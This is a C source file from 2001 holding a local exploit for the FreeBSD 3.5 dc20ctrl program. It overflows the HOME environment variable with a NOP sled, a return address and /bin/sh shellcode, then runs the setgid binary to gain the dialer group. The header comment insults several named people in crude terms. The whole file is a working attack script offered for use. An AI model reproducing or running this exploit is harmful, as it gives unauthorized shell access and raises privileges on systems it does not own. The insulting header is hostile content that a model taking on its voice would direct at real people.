/*
  dc20ctrl - this exploit is about as useful as the following people:
    
 ALIEN88 -  how many operz have you gone down on ?
 VETESGIRL - VETESCAN ROX MY SOX @#$$ OMG$%$ U SHOULD MARKET THAT SHIT
 TIMEX - KEEP OWNING THE EFNET CHANNELZ DOUD
 
 PS: This exploits a call to getenv() in session.c, I don't believe this is one of the
 bugs found by the freebsd team during their internal audit, atleast, not that I can see
 from the patch info, oh well, useless either way=]

 gives gid=dialer (freebsd 3.5)
 -mray
 joe@mindcrash-tech.com
*/   
 
#include <unistd.h> 
#include <stdio.h> 
#include <stdlib.h> 
    
#define BSIZE                   520 
#define EIP                     0xbfbfdcb8 
#define NOP                     0x90
#define PATH                    "/usr/local/bin/dc20ctrl"
     
char shellcode[] =    
   "\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07"
   "\x89\x56\x0f\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b"
   "\x8d\x4e\x0b\x89\xca\x52\x51\x53\x50\xeb\x18\xe8\xd8"
   "\xff\xff\xff/bin/sh\x01\x01\x01\x01\x02\x02\x02\x02"
   "\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04";
 
int main(int argc, char *argv[]) {  
    char *buf = NULL, *p = NULL; 
    long *addressp = NULL, address=EIP;
    int offset=0,i=0; 
    
    if(argc > 1){ 
      offset = atoi(argv[1]);
    }
    address -= offset; 
    if (!(buf = (char *)malloc(BSIZE))) {
      printf("error malloc()\n");
      exit(-1);
    } 
    p = buf; 
    addressp = (long *) p; 
    for (i = 0; i < BSIZE; i+=4) {
      *(addressp++) = address;
    }
    for (i = 0; i < (BSIZE - strlen(shellcode) - 4); i++) {
      buf[i] = NOP; 
    } 
    p = buf + (BSIZE - strlen(shellcode) - 4);
    for (i = 0; i < strlen(shellcode); i++) {
      *(p++) = shellcode[i];
    } 
    buf[BSIZE] = '\0'; 
    printf("ADDRESS 0x%lx OFFSET %d\n", address,offset);
    setenv("HOME", buf, 1);
    execlp(PATH, "dc20ctrl","-P","alien88izretarded", 0);  
} 
/*                   www.hack.co.za  [10 march 2001]*/